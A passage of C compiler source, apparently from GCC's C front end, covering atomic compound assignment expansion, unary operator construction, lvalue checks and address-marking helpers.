op0 = build2_loc (loc, POINTER_DIFF_EXPR, inttype, op0, op1);
}
/* This generates an error if op1 is pointer to incomplete type. */
if (!COMPLETE_OR_VOID_TYPE_P (TREE_TYPE (TREE_TYPE (orig_op1))))
error_at (loc, "arithmetic on pointer to an incomplete type");
else if (verify_type_context (loc, TCTX_POINTER_ARITH,
TREE_TYPE (TREE_TYPE (orig_op0))))
verify_type_context (loc, TCTX_POINTER_ARITH,
TREE_TYPE (TREE_TYPE (orig_op1)));
op1 = c_size_in_bytes (target_type);
if (pointer_to_zero_sized_aggr_p (TREE_TYPE (orig_op1)))
error_at (loc, "arithmetic on pointer to an empty aggregate");
/* Divide by the size, in easiest possible way. */
result = fold_build2_loc (loc, EXACT_DIV_EXPR, inttype,
op0, convert (inttype, op1));
/* Convert to final result type if necessary. */
return convert (restype, result);
}
/* Expand atomic compound assignments into an appropriate sequence as
specified by the C11 standard section 6.5.16.2.
_Atomic T1 E1
T2 E2
E1 op= E2
This sequence is used for all types for which these operations are
supported.
In addition, built-in versions of the 'fe' prefixed routines may
need to be invoked for floating point (real, complex or vector) when
floating-point exceptions are supported. See 6.5.16.2 footnote 113.
T1 newval;
T1 old;
T1 *addr
T2 val
fenv_t fenv
addr = &E1;
val = (E2);
__atomic_load (addr, &old, SEQ_CST);
feholdexcept (&fenv);
loop:
newval = old op val;
if (__atomic_compare_exchange_strong (addr, &old, &newval, SEQ_CST,
SEQ_CST))
goto done;
feclearexcept (FE_ALL_EXCEPT);
goto loop:
done:
feupdateenv (&fenv);
The compiler will issue the __atomic_fetch_* built-in when possible,
otherwise it will generate the generic form of the atomic operations.
This requires temp(s) and has their address taken. The atomic processing
is smart enough to figure out when the size of an object can utilize
a lock-free version, and convert the built-in call to the appropriate
lock-free routine. The optimizers will then dispose of any temps that
are no longer required, and lock-free implementations are utilized as
long as there is target support for the required size.
If the operator is NOP_EXPR, then this is a simple assignment, and
an __atomic_store is issued to perform the assignment rather than
the above loop. */
/* Build an atomic assignment at LOC, expanding into the proper
sequence to store LHS MODIFYCODE= RHS. Return a value representing
the result of the operation, unless RETURN_OLD_P, in which case
return the old value of LHS (this is only for postincrement and
postdecrement). */
static tree
build_atomic_assign (location_t loc, tree lhs, enum tree_code modifycode,
tree rhs, bool return_old_p)
{
tree fndecl, func_call;
vec<tree, va_gc> *params;
tree val, nonatomic_lhs_type, nonatomic_rhs_type, newval, newval_addr;
tree old, old_addr;
tree compound_stmt = NULL_TREE;
tree stmt, goto_stmt;
tree loop_label, loop_decl, done_label, done_decl;
tree lhs_type = TREE_TYPE (lhs);
tree lhs_addr = build_unary_op (loc, ADDR_EXPR, lhs, false);
tree seq_cst = build_int_cst (integer_type_node, MEMMODEL_SEQ_CST);
tree rhs_semantic_type = TREE_TYPE (rhs);
tree nonatomic_rhs_semantic_type;
tree rhs_type;
gcc_assert (TYPE_ATOMIC (lhs_type));
if (return_old_p)
gcc_assert (modifycode == PLUS_EXPR || modifycode == MINUS_EXPR);
/* Allocate enough vector items for a compare_exchange. */
vec_alloc (params, 6);
/* Create a compound statement to hold the sequence of statements
with a loop. */
if (modifycode != NOP_EXPR)
{
compound_stmt = c_begin_compound_stmt (false);
/* For consistency with build_modify_expr on non-_Atomic,
mark the lhs as read. Also, it would be very hard to match
such expressions in mark_exp_read. */
mark_exp_read (lhs);
}
/* Remove any excess precision (which is only present here in the
case of compound assignments). */
if (TREE_CODE (rhs) == EXCESS_PRECISION_EXPR)
{
gcc_assert (modifycode != NOP_EXPR);
rhs = TREE_OPERAND (rhs, 0);
}
rhs_type = TREE_TYPE (rhs);
/* Fold the RHS if it hasn't already been folded. */
if (modifycode != NOP_EXPR)
rhs = c_fully_fold (rhs, false, NULL);
/* Remove the qualifiers for the rest of the expressions and create
the VAL temp variable to hold the RHS. */
nonatomic_lhs_type = build_qualified_type (lhs_type, TYPE_UNQUALIFIED);
nonatomic_rhs_type = build_qualified_type (rhs_type, TYPE_UNQUALIFIED);
nonatomic_rhs_semantic_type = build_qualified_type (rhs_semantic_type,
TYPE_UNQUALIFIED);
val = create_tmp_var_raw (nonatomic_rhs_type);
TREE_ADDRESSABLE (val) = 1;
TREE_NO_WARNING (val) = 1;
rhs = build4 (TARGET_EXPR, nonatomic_rhs_type, val, rhs, NULL_TREE,
NULL_TREE);
TREE_SIDE_EFFECTS (rhs) = 1;
SET_EXPR_LOCATION (rhs, loc);
if (modifycode != NOP_EXPR)
add_stmt (rhs);
/* NOP_EXPR indicates it's a straight store of the RHS. Simply issue
an atomic_store. */
if (modifycode == NOP_EXPR)
{
compound_stmt = rhs;
/* Build __atomic_store (&lhs, &val, SEQ_CST) */
rhs = build_unary_op (loc, ADDR_EXPR, val, false);
fndecl = builtin_decl_explicit (BUILT_IN_ATOMIC_STORE);
params->quick_push (lhs_addr);
params->quick_push (rhs);
params->quick_push (seq_cst);
func_call = c_build_function_call_vec (loc, vNULL, fndecl, params, NULL);
compound_stmt = build2 (COMPOUND_EXPR, void_type_node,
compound_stmt, func_call);
/* VAL is the value which was stored, return a COMPOUND_STMT of
the statement and that value. */
return build2 (COMPOUND_EXPR, nonatomic_lhs_type, compound_stmt, val);
}
/* Attempt to implement the atomic operation as an __atomic_fetch_* or
__atomic_*_fetch built-in rather than a CAS loop. atomic_bool type
isn't applicable for such builtins. ??? Do we want to handle enums? */
if ((TREE_CODE (lhs_type) == INTEGER_TYPE || POINTER_TYPE_P (lhs_type))
&& TREE_CODE (rhs_type) == INTEGER_TYPE)
{
built_in_function fncode;
switch (modifycode)
{
case PLUS_EXPR:
case POINTER_PLUS_EXPR:
fncode = (return_old_p
? BUILT_IN_ATOMIC_FETCH_ADD_N
: BUILT_IN_ATOMIC_ADD_FETCH_N);
break;
case MINUS_EXPR:
fncode = (return_old_p
? BUILT_IN_ATOMIC_FETCH_SUB_N
: BUILT_IN_ATOMIC_SUB_FETCH_N);
break;
case BIT_AND_EXPR:
fncode = (return_old_p
? BUILT_IN_ATOMIC_FETCH_AND_N
: BUILT_IN_ATOMIC_AND_FETCH_N);
break;
case BIT_IOR_EXPR:
fncode = (return_old_p
? BUILT_IN_ATOMIC_FETCH_OR_N
: BUILT_IN_ATOMIC_OR_FETCH_N);
break;
case BIT_XOR_EXPR:
fncode = (return_old_p
? BUILT_IN_ATOMIC_FETCH_XOR_N
: BUILT_IN_ATOMIC_XOR_FETCH_N);
break;
default:
goto cas_loop;
}
/* We can only use "_1" through "_16" variants of the atomic fetch
built-ins. */
unsigned HOST_WIDE_INT size = tree_to_uhwi (TYPE_SIZE_UNIT (lhs_type));
if (size != 1 && size != 2 && size != 4 && size != 8 && size != 16)
goto cas_loop;
/* If this is a pointer type, we need to multiply by the size of
the pointer target type. */
if (POINTER_TYPE_P (lhs_type))
{
if (!COMPLETE_TYPE_P (TREE_TYPE (lhs_type))
/* ??? This would introduce -Wdiscarded-qualifiers
warning: __atomic_fetch_* expect volatile void *
type as the first argument. (Assignments between
atomic and non-atomic objects are OK.) */
|| TYPE_RESTRICT (lhs_type))
goto cas_loop;
tree sz = TYPE_SIZE_UNIT (TREE_TYPE (lhs_type));
rhs = fold_build2_loc (loc, MULT_EXPR, ptrdiff_type_node,
convert (ptrdiff_type_node, rhs),
convert (ptrdiff_type_node, sz));
}
/* Build __atomic_fetch_* (&lhs, &val, SEQ_CST), or
__atomic_*_fetch (&lhs, &val, SEQ_CST). */
fndecl = builtin_decl_explicit (fncode);
params->quick_push (lhs_addr);
params->quick_push (rhs);
params->quick_push (seq_cst);
func_call = c_build_function_call_vec (loc, vNULL, fndecl, params, NULL);
newval = create_tmp_var_raw (nonatomic_lhs_type);
TREE_ADDRESSABLE (newval) = 1;
TREE_NO_WARNING (newval) = 1;
rhs = build4 (TARGET_EXPR, nonatomic_lhs_type, newval, func_call,
NULL_TREE, NULL_TREE);
SET_EXPR_LOCATION (rhs, loc);
add_stmt (rhs);
/* Finish the compound statement. */
compound_stmt = c_end_compound_stmt (loc, compound_stmt, false);
/* NEWVAL is the value which was stored, return a COMPOUND_STMT of
the statement and that value. */
return build2 (COMPOUND_EXPR, nonatomic_lhs_type, compound_stmt, newval);
}
cas_loop:
/* Create the variables and labels required for the op= form. */
old = create_tmp_var_raw (nonatomic_lhs_type);
old_addr = build_unary_op (loc, ADDR_EXPR, old, false);
TREE_ADDRESSABLE (old) = 1;
TREE_NO_WARNING (old) = 1;
newval = create_tmp_var_raw (nonatomic_lhs_type);
newval_addr = build_unary_op (loc, ADDR_EXPR, newval, false);
TREE_ADDRESSABLE (newval) = 1;
TREE_NO_WARNING (newval) = 1;
loop_decl = create_artificial_label (loc);
loop_label = build1 (LABEL_EXPR, void_type_node, loop_decl);
done_decl = create_artificial_label (loc);
done_label = build1 (LABEL_EXPR, void_type_node, done_decl);
/* __atomic_load (addr, &old, SEQ_CST). */
fndecl = builtin_decl_explicit (BUILT_IN_ATOMIC_LOAD);
params->quick_push (lhs_addr);
params->quick_push (old_addr);
params->quick_push (seq_cst);
func_call = c_build_function_call_vec (loc, vNULL, fndecl, params, NULL);
old = build4 (TARGET_EXPR, nonatomic_lhs_type, old, func_call, NULL_TREE,
NULL_TREE);
add_stmt (old);
params->truncate (0);
/* Create the expressions for floating-point environment
manipulation, if required. */
bool need_fenv = (flag_trapping_math
&& (FLOAT_TYPE_P (lhs_type) || FLOAT_TYPE_P (rhs_type)));
tree hold_call = NULL_TREE, clear_call = NULL_TREE, update_call = NULL_TREE;
if (need_fenv)
targetm.atomic_assign_expand_fenv (&hold_call, &clear_call, &update_call);
if (hold_call)
add_stmt (hold_call);
/* loop: */
add_stmt (loop_label);
/* newval = old + val; */
if (rhs_type != rhs_semantic_type)
val = build1 (EXCESS_PRECISION_EXPR, nonatomic_rhs_semantic_type, val);
rhs = build_binary_op (loc, modifycode, old, val, true);
if (TREE_CODE (rhs) == EXCESS_PRECISION_EXPR)
{
tree eptype = TREE_TYPE (rhs);
rhs = c_fully_fold (TREE_OPERAND (rhs, 0), false, NULL);
rhs = build1 (EXCESS_PRECISION_EXPR, eptype, rhs);
}
else
rhs = c_fully_fold (rhs, false, NULL);
rhs = convert_for_assignment (loc, UNKNOWN_LOCATION, nonatomic_lhs_type,
rhs, NULL_TREE, ic_assign, false, NULL_TREE,
NULL_TREE, 0);
if (rhs != error_mark_node)
{
rhs = build4 (TARGET_EXPR, nonatomic_lhs_type, newval, rhs, NULL_TREE,
NULL_TREE);
SET_EXPR_LOCATION (rhs, loc);
add_stmt (rhs);
}
/* if (__atomic_compare_exchange (addr, &old, &new, false, SEQ_CST, SEQ_CST))
goto done; */
fndecl = builtin_decl_explicit (BUILT_IN_ATOMIC_COMPARE_EXCHANGE);
params->quick_push (lhs_addr);
params->quick_push (old_addr);
params->quick_push (newval_addr);
params->quick_push (integer_zero_node);
params->quick_push (seq_cst);
params->quick_push (seq_cst);
func_call = c_build_function_call_vec (loc, vNULL, fndecl, params, NULL);
goto_stmt = build1 (GOTO_EXPR, void_type_node, done_decl);
SET_EXPR_LOCATION (goto_stmt, loc);
stmt = build3 (COND_EXPR, void_type_node, func_call, goto_stmt, NULL_TREE);
SET_EXPR_LOCATION (stmt, loc);
add_stmt (stmt);
if (clear_call)
add_stmt (clear_call);
/* goto loop; */
goto_stmt = build1 (GOTO_EXPR, void_type_node, loop_decl);
SET_EXPR_LOCATION (goto_stmt, loc);
add_stmt (goto_stmt);
/* done: */
add_stmt (done_label);
if (update_call)
add_stmt (update_call);
/* Finish the compound statement. */
compound_stmt = c_end_compound_stmt (loc, compound_stmt, false);
/* NEWVAL is the value that was successfully stored, return a
COMPOUND_EXPR of the statement and the appropriate value. */
return build2 (COMPOUND_EXPR, nonatomic_lhs_type, compound_stmt,
return_old_p ? old : newval);
}
/* Construct and perhaps optimize a tree representation
for a unary operation. CODE, a tree_code, specifies the operation
and XARG is the operand.
For any CODE other than ADDR_EXPR, NOCONVERT suppresses the default
promotions (such as from short to int).
For ADDR_EXPR, the default promotions are not applied; NOCONVERT allows
non-lvalues; this is only used to handle conversion of non-lvalue arrays
to pointers in C99.
LOCATION is the location of the operator. */
tree
build_unary_op (location_t location, enum tree_code code, tree xarg,
bool noconvert)
{
/* No default_conversion here. It causes trouble for ADDR_EXPR. */
tree arg = xarg;
tree argtype = NULL_TREE;
enum tree_code typecode;
tree val;
tree ret = error_mark_node;
tree eptype = NULL_TREE;
const char *invalid_op_diag;
bool int_operands;
int_operands = EXPR_INT_CONST_OPERANDS (xarg);
if (int_operands)
arg = remove_c_maybe_const_expr (arg);
if (code != ADDR_EXPR)
arg = require_complete_type (location, arg);
typecode = TREE_CODE (TREE_TYPE (arg));
if (typecode == ERROR_MARK)
return error_mark_node;
if (typecode == ENUMERAL_TYPE || typecode == BOOLEAN_TYPE)
typecode = INTEGER_TYPE;
if ((invalid_op_diag
= targetm.invalid_unary_op (code, TREE_TYPE (xarg))))
{
error_at (location, invalid_op_diag);
return error_mark_node;
}
if (TREE_CODE (arg) == EXCESS_PRECISION_EXPR)
{
eptype = TREE_TYPE (arg);
arg = TREE_OPERAND (arg, 0);
}
switch (code)
{
case CONVERT_EXPR:
/* This is used for unary plus, because a CONVERT_EXPR
is enough to prevent anybody from looking inside for
associativity, but won't generate any code. */
if (!(typecode == INTEGER_TYPE || typecode == REAL_TYPE
|| typecode == FIXED_POINT_TYPE || typecode == COMPLEX_TYPE
|| gnu_vector_type_p (TREE_TYPE (arg))))
{
error_at (location, "wrong type argument to unary plus");
return error_mark_node;
}
else if (!noconvert)
arg = default_conversion (arg);
arg = non_lvalue_loc (location, arg);
break;
case NEGATE_EXPR:
if (!(typecode == INTEGER_TYPE || typecode == REAL_TYPE
|| typecode == FIXED_POINT_TYPE || typecode == COMPLEX_TYPE
|| gnu_vector_type_p (TREE_TYPE (arg))))
{
error_at (location, "wrong type argument to unary minus");
return error_mark_node;
}
else if (!noconvert)
arg = default_conversion (arg);
break;
case BIT_NOT_EXPR:
/* ~ works on integer types and non float vectors. */
if (typecode == INTEGER_TYPE
|| (gnu_vector_type_p (TREE_TYPE (arg))
&& !VECTOR_FLOAT_TYPE_P (TREE_TYPE (arg))))
{
tree e = arg;
/* Warn if the expression has boolean value. */
while (TREE_CODE (e) == COMPOUND_EXPR)
e = TREE_OPERAND (e, 1);
if ((TREE_CODE (TREE_TYPE (arg)) == BOOLEAN_TYPE
|| truth_value_p (TREE_CODE (e))))
{
auto_diagnostic_group d;
if (warning_at (location, OPT_Wbool_operation,
"%<~%> on a boolean expression"))
{
gcc_rich_location richloc (location);
richloc.add_fixit_insert_before (location, "!");
inform (&richloc, "did you mean to use logical not?");
}
}
if (!noconvert)
arg = default_conversion (arg);
}
else if (typecode == COMPLEX_TYPE)
{
code = CONJ_EXPR;
pedwarn (location, OPT_Wpedantic,
"ISO C does not support %<~%> for complex conjugation");
if (!noconvert)
arg = default_conversion (arg);
}
else
{
error_at (location, "wrong type argument to bit-complement");
return error_mark_node;
}
break;
case ABS_EXPR:
if (!(typecode == INTEGER_TYPE || typecode == REAL_TYPE))
{
error_at (location, "wrong type argument to abs");
return error_mark_node;
}
else if (!noconvert)
arg = default_conversion (arg);
break;
case ABSU_EXPR:
if (!(typecode == INTEGER_TYPE))
{
error_at (location, "wrong type argument to absu");
return error_mark_node;
}
else if (!noconvert)
arg = default_conversion (arg);
break;
case CONJ_EXPR:
/* Conjugating a real value is a no-op, but allow it anyway. */
if (!(typecode == INTEGER_TYPE || typecode == REAL_TYPE
|| typecode == COMPLEX_TYPE))
{
error_at (location, "wrong type argument to conjugation");
return error_mark_node;
}
else if (!noconvert)
arg = default_conversion (arg);
break;
case TRUTH_NOT_EXPR:
if (typecode != INTEGER_TYPE && typecode != FIXED_POINT_TYPE
&& typecode != REAL_TYPE && typecode != POINTER_TYPE
&& typecode != COMPLEX_TYPE)
{
error_at (location,
"wrong type argument to unary exclamation mark");
return error_mark_node;
}
if (int_operands)
{
arg = c_objc_common_truthvalue_conversion (location, xarg);
arg = remove_c_maybe_const_expr (arg);
}
else
arg = c_objc_common_truthvalue_conversion (location, arg);
ret = invert_truthvalue_loc (location, arg);
/* If the TRUTH_NOT_EXPR has been folded, reset the location. */
if (EXPR_P (ret) && EXPR_HAS_LOCATION (ret))
location = EXPR_LOCATION (ret);
goto return_build_unary_op;
case REALPART_EXPR:
case IMAGPART_EXPR:
ret = build_real_imag_expr (location, code, arg);
if (ret == error_mark_node)
return error_mark_node;
if (eptype && TREE_CODE (eptype) == COMPLEX_TYPE)
eptype = TREE_TYPE (eptype);
goto return_build_unary_op;
case PREINCREMENT_EXPR:
case POSTINCREMENT_EXPR:
case PREDECREMENT_EXPR:
case POSTDECREMENT_EXPR:
if (TREE_CODE (arg) == C_MAYBE_CONST_EXPR)
{
tree inner = build_unary_op (location, code,
C_MAYBE_CONST_EXPR_EXPR (arg),
noconvert);
if (inner == error_mark_node)
return error_mark_node;
ret = build2 (C_MAYBE_CONST_EXPR, TREE_TYPE (inner),
C_MAYBE_CONST_EXPR_PRE (arg), inner);
gcc_assert (!C_MAYBE_CONST_EXPR_INT_OPERANDS (arg));
C_MAYBE_CONST_EXPR_NON_CONST (ret) = 1;
goto return_build_unary_op;
}
/* Complain about anything that is not a true lvalue. In
Objective-C, skip this check for property_refs. */
if (!objc_is_property_ref (arg)
&& !lvalue_or_else (location,
arg, ((code == PREINCREMENT_EXPR
|| code == POSTINCREMENT_EXPR)
? lv_increment
: lv_decrement)))
return error_mark_node;
if (warn_cxx_compat && TREE_CODE (TREE_TYPE (arg)) == ENUMERAL_TYPE)
{
if (code == PREINCREMENT_EXPR || code == POSTINCREMENT_EXPR)
warning_at (location, OPT_Wc___compat,
"increment of enumeration value is invalid in C++");
else
warning_at (location, OPT_Wc___compat,
"decrement of enumeration value is invalid in C++");
}
if (TREE_CODE (TREE_TYPE (arg)) == BOOLEAN_TYPE)
{
if (code == PREINCREMENT_EXPR || code == POSTINCREMENT_EXPR)
warning_at (location, OPT_Wbool_operation,
"increment of a boolean expression");
else
warning_at (location, OPT_Wbool_operation,
"decrement of a boolean expression");
}
/* Ensure the argument is fully folded inside any SAVE_EXPR. */
arg = c_fully_fold (arg, false, NULL, true);
bool atomic_op;
atomic_op = really_atomic_lvalue (arg);
/* Increment or decrement the real part of the value,
and don't change the imaginary part. */
if (typecode == COMPLEX_TYPE)
{
tree real, imag;
pedwarn (location, OPT_Wpedantic,
"ISO C does not support %<++%> and %<--%> on complex types");
if (!atomic_op)
{
arg = stabilize_reference (arg);
real = build_unary_op (EXPR_LOCATION (arg), REALPART_EXPR, arg,
true);
imag = build_unary_op (EXPR_LOCATION (arg), IMAGPART_EXPR, arg,
true);
real = build_unary_op (EXPR_LOCATION (arg), code, real, true);
if (real == error_mark_node || imag == error_mark_node)
return error_mark_node;
ret = build2 (COMPLEX_EXPR, TREE_TYPE (arg),
real, imag);
goto return_build_unary_op;
}
}
/* Report invalid types. */
if (typecode != POINTER_TYPE && typecode != FIXED_POINT_TYPE
&& typecode != INTEGER_TYPE && typecode != REAL_TYPE
&& typecode != COMPLEX_TYPE
&& !gnu_vector_type_p (TREE_TYPE (arg)))
{
if (code == PREINCREMENT_EXPR || code == POSTINCREMENT_EXPR)
error_at (location, "wrong type argument to increment");
else
error_at (location, "wrong type argument to decrement");
return error_mark_node;
}
{
tree inc;
argtype = TREE_TYPE (arg);
/* Compute the increment. */
if (typecode == POINTER_TYPE)
{
/* If pointer target is an incomplete type,
we just cannot know how to do the arithmetic. */
if (!COMPLETE_OR_VOID_TYPE_P (TREE_TYPE (argtype)))
{
if (code == PREINCREMENT_EXPR || code == POSTINCREMENT_EXPR)
error_at (location,
"increment of pointer to an incomplete type %qT",
TREE_TYPE (argtype));
else
error_at (location,
"decrement of pointer to an incomplete type %qT",
TREE_TYPE (argtype));
}
else if (TREE_CODE (TREE_TYPE (argtype)) == FUNCTION_TYPE
|| TREE_CODE (TREE_TYPE (argtype)) == VOID_TYPE)
{
if (code == PREINCREMENT_EXPR || code == POSTINCREMENT_EXPR)
pedwarn (location, OPT_Wpointer_arith,
"wrong type argument to increment");
else
pedwarn (location, OPT_Wpointer_arith,
"wrong type argument to decrement");
}
else
verify_type_context (location, TCTX_POINTER_ARITH,
TREE_TYPE (argtype));
inc = c_size_in_bytes (TREE_TYPE (argtype));
inc = convert_to_ptrofftype_loc (location, inc);
}
else if (FRACT_MODE_P (TYPE_MODE (argtype)))
{
/* For signed fract types, we invert ++ to -- or
-- to ++, and change inc from 1 to -1, because
it is not possible to represent 1 in signed fract constants.
For unsigned fract types, the result always overflows and
we get an undefined (original) or the maximum value. */
if (code == PREINCREMENT_EXPR)
code = PREDECREMENT_EXPR;
else if (code == PREDECREMENT_EXPR)
code = PREINCREMENT_EXPR;
else if (code == POSTINCREMENT_EXPR)
code = POSTDECREMENT_EXPR;
else /* code == POSTDECREMENT_EXPR */
code = POSTINCREMENT_EXPR;
inc = integer_minus_one_node;
inc = convert (argtype, inc);
}
else
{
inc = VECTOR_TYPE_P (argtype)
? build_one_cst (argtype)
: integer_one_node;
inc = convert (argtype, inc);
}
/* If 'arg' is an Objective-C PROPERTY_REF expression, then we
need to ask Objective-C to build the increment or decrement
expression for it. */
if (objc_is_property_ref (arg))
return objc_build_incr_expr_for_property_ref (location, code,
arg, inc);
/* Report a read-only lvalue. */
if (TYPE_READONLY (argtype))
{
readonly_error (location, arg,
((code == PREINCREMENT_EXPR
|| code == POSTINCREMENT_EXPR)
? lv_increment : lv_decrement));
return error_mark_node;
}
else if (TREE_READONLY (arg))
readonly_warning (arg,
((code == PREINCREMENT_EXPR
|| code == POSTINCREMENT_EXPR)
? lv_increment : lv_decrement));
/* If the argument is atomic, use the special code sequences for
atomic compound assignment. */
if (atomic_op)
{
arg = stabilize_reference (arg);
ret = build_atomic_assign (location, arg,
((code == PREINCREMENT_EXPR
|| code == POSTINCREMENT_EXPR)
? PLUS_EXPR
: MINUS_EXPR),
(FRACT_MODE_P (TYPE_MODE (argtype))
? inc
: integer_one_node),
(code == POSTINCREMENT_EXPR
|| code == POSTDECREMENT_EXPR));
goto return_build_unary_op;
}
if (TREE_CODE (TREE_TYPE (arg)) == BOOLEAN_TYPE)
val = boolean_increment (code, arg);
else
val = build2 (code, TREE_TYPE (arg), arg, inc);
TREE_SIDE_EFFECTS (val) = 1;
if (TREE_CODE (val) != code)
TREE_NO_WARNING (val) = 1;
ret = val;
goto return_build_unary_op;
}
case ADDR_EXPR:
/* Note that this operation never does default_conversion. */
/* The operand of unary '&' must be an lvalue (which excludes
expressions of type void), or, in C99, the result of a [] or
unary '*' operator. */
if (VOID_TYPE_P (TREE_TYPE (arg))
&& TYPE_QUALS (TREE_TYPE (arg)) == TYPE_UNQUALIFIED
&& (!INDIRECT_REF_P (arg) || !flag_isoc99))
pedwarn (location, 0, "taking address of expression of type %<void%>");
/* Let &* cancel out to simplify resulting code. */
if (INDIRECT_REF_P (arg))
{
/* Don't let this be an lvalue. */
if (lvalue_p (TREE_OPERAND (arg, 0)))
return non_lvalue_loc (location, TREE_OPERAND (arg, 0));
ret = TREE_OPERAND (arg, 0);
goto return_build_unary_op;
}
/* Anything not already handled and not a true memory reference
or a non-lvalue array is an error. */
if (typecode != FUNCTION_TYPE && !noconvert
&& !lvalue_or_else (location, arg, lv_addressof))
return error_mark_node;
/* Move address operations inside C_MAYBE_CONST_EXPR to simplify
folding later. */
if (TREE_CODE (arg) == C_MAYBE_CONST_EXPR)
{
tree inner = build_unary_op (location, code,
C_MAYBE_CONST_EXPR_EXPR (arg),
noconvert);
ret = build2 (C_MAYBE_CONST_EXPR, TREE_TYPE (inner),
C_MAYBE_CONST_EXPR_PRE (arg), inner);
gcc_assert (!C_MAYBE_CONST_EXPR_INT_OPERANDS (arg));
C_MAYBE_CONST_EXPR_NON_CONST (ret)
= C_MAYBE_CONST_EXPR_NON_CONST (arg);
goto return_build_unary_op;
}
/* Ordinary case; arg is a COMPONENT_REF or a decl. */
argtype = TREE_TYPE (arg);
/* If the lvalue is const or volatile, merge that into the type
to which the address will point. This is only needed
for function types. */
if ((DECL_P (arg) || REFERENCE_CLASS_P (arg))
&& (TREE_READONLY (arg) || TREE_THIS_VOLATILE (arg))
&& TREE_CODE (argtype) == FUNCTION_TYPE)
{
int orig_quals = TYPE_QUALS (strip_array_types (argtype));
int quals = orig_quals;
if (TREE_READONLY (arg))
quals |= TYPE_QUAL_CONST;
if (TREE_THIS_VOLATILE (arg))
quals |= TYPE_QUAL_VOLATILE;
argtype = c_build_qualified_type (argtype, quals);
}
switch (TREE_CODE (arg))
{
case COMPONENT_REF:
if (DECL_C_BIT_FIELD (TREE_OPERAND (arg, 1)))
{
error_at (location, "cannot take address of bit-field %qD",
TREE_OPERAND (arg, 1));
return error_mark_node;
}
/* fall through */
case ARRAY_REF:
if (TYPE_REVERSE_STORAGE_ORDER (TREE_TYPE (TREE_OPERAND (arg, 0))))
{
if (!AGGREGATE_TYPE_P (TREE_TYPE (arg))
&& !VECTOR_TYPE_P (TREE_TYPE (arg)))
{
error_at (location, "cannot take address of scalar with "
"reverse storage order");
return error_mark_node;
}
if (TREE_CODE (TREE_TYPE (arg)) == ARRAY_TYPE
&& TYPE_REVERSE_STORAGE_ORDER (TREE_TYPE (arg)))
warning_at (location, OPT_Wscalar_storage_order,
"address of array with reverse scalar storage "
"order requested");
}
default:
break;
}
if (!c_mark_addressable (arg))
return error_mark_node;
gcc_assert (TREE_CODE (arg) != COMPONENT_REF
|| !DECL_C_BIT_FIELD (TREE_OPERAND (arg, 1)));
argtype = build_pointer_type (argtype);
/* ??? Cope with user tricks that amount to offsetof. Delete this
when we have proper support for integer constant expressions. */
val = get_base_address (arg);
if (val && INDIRECT_REF_P (val)
&& TREE_CONSTANT (TREE_OPERAND (val, 0)))
{
ret = fold_offsetof (arg, argtype);
goto return_build_unary_op;
}
val = build1 (ADDR_EXPR, argtype, arg);
ret = val;
goto return_build_unary_op;
default:
gcc_unreachable ();
}
if (argtype == NULL_TREE)
argtype = TREE_TYPE (arg);
if (TREE_CODE (arg) == INTEGER_CST)
ret = (require_constant_value
? fold_build1_initializer_loc (location, code, argtype, arg)
: fold_build1_loc (location, code, argtype, arg));
else
ret = build1 (code, argtype, arg);
return_build_unary_op:
gcc_assert (ret != error_mark_node);
if (TREE_CODE (ret) == INTEGER_CST && !TREE_OVERFLOW (ret)
&& !(TREE_CODE (xarg) == INTEGER_CST && !TREE_OVERFLOW (xarg)))
ret = build1 (NOP_EXPR, TREE_TYPE (ret), ret);
else if (TREE_CODE (ret) != INTEGER_CST && int_operands)
ret = note_integer_operands (ret);
if (eptype)
ret = build1 (EXCESS_PRECISION_EXPR, eptype, ret);
protected_set_expr_location (ret, location);
return ret;
}
/* Return nonzero if REF is an lvalue valid for this language.
Lvalues can be assigned, unless their type has TYPE_READONLY.
Lvalues can have their address taken, unless they have C_DECL_REGISTER. */
bool
lvalue_p (const_tree ref)
{
const enum tree_code code = TREE_CODE (ref);
switch (code)
{
case REALPART_EXPR:
case IMAGPART_EXPR:
case COMPONENT_REF:
return lvalue_p (TREE_OPERAND (ref, 0));
case C_MAYBE_CONST_EXPR:
return lvalue_p (TREE_OPERAND (ref, 1));
case COMPOUND_LITERAL_EXPR:
case STRING_CST:
return true;
case INDIRECT_REF:
case ARRAY_REF:
case VAR_DECL:
case PARM_DECL:
case RESULT_DECL:
case ERROR_MARK:
return (TREE_CODE (TREE_TYPE (ref)) != FUNCTION_TYPE
&& TREE_CODE (TREE_TYPE (ref)) != METHOD_TYPE);
case BIND_EXPR:
return TREE_CODE (TREE_TYPE (ref)) == ARRAY_TYPE;
default:
return false;
}
}
/* Give a warning for storing in something that is read-only in GCC
terms but not const in ISO C terms. */
static void
readonly_warning (tree arg, enum lvalue_use use)
{
switch (use)
{
case lv_assign:
warning (0, "assignment of read-only location %qE", arg);
break;
case lv_increment:
warning (0, "increment of read-only location %qE", arg);
break;
case lv_decrement:
warning (0, "decrement of read-only location %qE", arg);
break;
default:
gcc_unreachable ();
}
return;
}
/* Return nonzero if REF is an lvalue valid for this language;
otherwise, print an error message and return zero. USE says
how the lvalue is being used and so selects the error message.
LOCATION is the location at which any error should be reported. */
static int
lvalue_or_else (location_t loc, const_tree ref, enum lvalue_use use)
{
int win = lvalue_p (ref);
if (!win)
lvalue_error (loc, use);
return win;
}
/* Mark EXP saying that we need to be able to take the
address of it; it should not be allocated in a register.
Returns true if successful. ARRAY_REF_P is true if this
is for ARRAY_REF construction - in that case we don't want
to look through VIEW_CONVERT_EXPR from VECTOR_TYPE to ARRAY_TYPE,
it is fine to use ARRAY_REFs for vector subscripts on vector
register variables. */
bool
c_mark_addressable (tree exp, bool array_ref_p)
{
tree x = exp;
while (1)
switch (TREE_CODE (x))
{
case VIEW_CONVERT_EXPR:
if (array_ref_p
&& TREE_CODE (TREE_TYPE (x)) == ARRAY_TYPE
&& VECTOR_TYPE_P (TREE_TYPE (TREE_OPERAND (x, 0))))
return true;
/* FALLTHRU */
case COMPONENT_REF:
case ADDR_EXPR:
case ARRAY_REF:
case REALPART_EXPR:
case IMAGPART_EXPR:
x = TREE_OPERAND (x, 0);
break;
case COMPOUND_LITERAL_EXPR:
TREE_ADDRESSABLE (x) = 1;
TREE_ADDRESSABLE (COMPOUND_LITERAL_EXPR_DECL (x)) = 1;
return true;
case CONSTRUCTOR:
TREE_ADDRESSABLE (x) = 1;
return true;
case VAR_DECL:
case CONST_DECL:
case PARM_DECL:
case RESULT_DECL:
if (C_DECL_REGISTER (x)
&& DECL_NONLOCAL (x))
{
if (TREE_PUBLIC (x) || is_global_var (x))
{
error
("global register variable %qD used in nested function", x);
return false;
}
pedwarn (input_location, 0, "register variable %qD used in nested function", x);
}
